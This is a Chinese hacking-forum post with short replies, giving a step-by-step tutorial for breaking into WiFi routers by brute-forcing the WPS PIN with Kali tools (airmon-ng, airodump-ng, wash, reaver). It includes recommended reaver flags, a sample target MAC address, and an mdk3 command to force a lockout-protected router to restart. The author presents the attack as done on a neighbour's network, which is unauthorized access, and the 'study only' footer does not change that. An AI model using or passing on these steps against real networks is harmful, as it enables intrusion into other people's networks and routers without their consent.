村长 发表于 2022-1-28 22:29:14

【FX】使用kali入侵wifi拿下路由器


大家好,我是楠曦~~
http://cdn.u1.huluxia.com/g4/M03/79/E0/rBAAdmEohvuAMNuhAAMNHxtwXvE88.jpeg
WPA2-PSK加密原理
现在的路由器大多都默认用 WPA2-PSK 方式对无线网络进行加密了,不能再像 WEP 加密方式那样好破解,使用字典又需要费心费力地整理字典,而且字典破解的效率还慢。所以我们需要更有效率的破解方法。好在现在大多数的路由器都提供 WPS 功能,通过这个功能,用户可以使用 PIN 码登录到路由器。但这个 PIN 码的长度只有 8 位,而且可能的取值只有11000种(注意,不是 10 ^8种)。所以我们可以进行简单粗暴的穷举 PIN 码破解,而且我们可以推断出这种破解方法在目标 AP 开启了 WPS 功能的情况下是可以百分之百破解它的。这其实是很老的破解手段了,但至今依然奏效。

操作步骤
1.切换无线网卡到监听模式

airmon-ngstartwlan0

2刺探附近 WLAN 网络(这个命令所跟的参数值可以在 步骤1 完成后从提示信息中查看到)

airodump-ngwlan0mon
http://cdn.u1.huluxia.com/g4/M00/79/E6/rBAAdmEoisuAVVKMAAEqNMX1ukM998.png
3.找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址)

wash-iwlan0mon
http://cdn.u1.huluxia.com/g4/M00/79/E6/rBAAdmEoisyAfISqAAEBsBt-078925.png
4.开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v)

reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv

参数说明:
-i 无线网卡名称
-b 目标AP的mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高破解速度
-vv 显示更多的非严重警告(注意这是 2 个小写字母 v)
-d 即delay每穷举一次的闲置时间 预设为1秒
-c 信道编号
-p PIN码四位或八位 //可以用8位直接找到密码。

破解时推荐使用这个命令:reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv,因为–d9 –t9参数可以防止pin死路由器。http://cdn.u1.huluxia.com/g4/M00/79/E6/rBAAdmEois2ADcPHAAQqwYQhCRY857.jpg
5.等待破解完成(这个破解可能会时间比较长,和你的目标 AP 有关,隔壁妹子没有网络安全意识,密码很脆弱,只用了几分钟便破解了),这期间我们可以查看到穷举破解花费的时间、预计剩余时间、穷举PIN码进度 信息http://cdn.u1.huluxia.com/g4/M00/79/E6/rBAAdmEoitWARqJpAADlCnSouNg446.jpg
6.破解成功http://cdn.u1.huluxia.com/g4/M00/79/E6/rBAAdmEoiteAF-96AAFnwradELU458.jpg
7.成功联网
http://cdn.u1.huluxia.com/g4/M00/79/E6/rBAAdmEoituAC0AoAAA4PgfTs7Q256.jpg
http://cdn.u1.huluxia.com/g4/M00/79/E6/rBAAdmEoituANKEyAAGOTiuSxPo299.jpg
8.拿下路由器http://cdn.u1.huluxia.com/g4/M00/79/E6/rBAAdmEoiuKAYADaAAD4BNi8FV0809.jpg
注意事项
如果在执行 reaver 命令后看到有 WARNING: Failed to associate with xx:xx:xx:xx:xx:xx 这样的提示信息,那么应该是你选择了一个不具备或关闭了 WPS 功能的路由器。这种情况下就执行wash 命令并重新选择一个路由器吧。

如果在执行 reaver 命令后看到有 warning detected ap rate limiting waiting 60 seconds before re-checking 这样的提示信息,这表示目标路由器开启了防 PIN破解 功能。因为我们是穷举 PIN码 进行破解的,当连续使用超过某个次数的 PIN码 后,路由器会暂时锁定 WPS 功能一段时间。这种情况下要么我们耐心等待其恢复 WPS 功能,要么执行 mdk3 wlan0mon a -a xx:xx:xx:xx:xx:xx (这是上面的目标AP的MAC地址)命令让路由器主动重启或被动重启以恢复 WPS 功能。

下期预告破,解WPA2-PSK加密
直播通道#【FX】震惊使用kali居然可以破.解WPA2-PSK加密直播中#

天镜盗梦 发表于 2022-1-29 15:23:56

专业抢沙发的!哈哈

liqiang24 发表于 2022-2-1 14:17:25

好帖必须得顶起

68079330 发表于 2022-2-1 22:51:58

看看好用不

千面萌萌 发表于 2022-2-2 14:45:27

路过

千百渡 发表于 2022-2-4 11:17:28

支持村长

伴我多久 发表于 2022-2-4 20:41:13

介是神马?!!
页: [1]
查看完整版本: 【FX】使用kali入侵wifi拿下路由器

村长黑科技是专业提供项目资源的服务的村长黑科技平台,如合购网赚项目、引流推广软件、软件程序开发等项目就选村长黑科
技平台参与或发布项目定制各种软件就来村长黑科技平台

本站中所有被研究的素材与信息全部来源于互联网,版权争议与本站无关。本站所发布的任何软件的破解分析文章、破解分析视频、补丁、注册机和注册信息,

仅限用于学习和研究软件安全的目的。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。学习破解分析技术是为了更好的完善软件可能存在的不安全因素,提升软件安全意识。所以您如果喜欢某程序,

请购买注册正版软件,获得正版优质服务!不允许将上述内容私自传播、销售或者其他任何非法用途!否则,产生任何法律责任,一切后果请用户自负,与本网站无关!如有侵权或非法用途请举报!请发送到邮箱:cxphj8@foxmail.com

《意见反馈》或《截图指定页面备注》发送到邮件,收到后24小时内删除,禁止用户学习使用关掉用户【学习使用权】!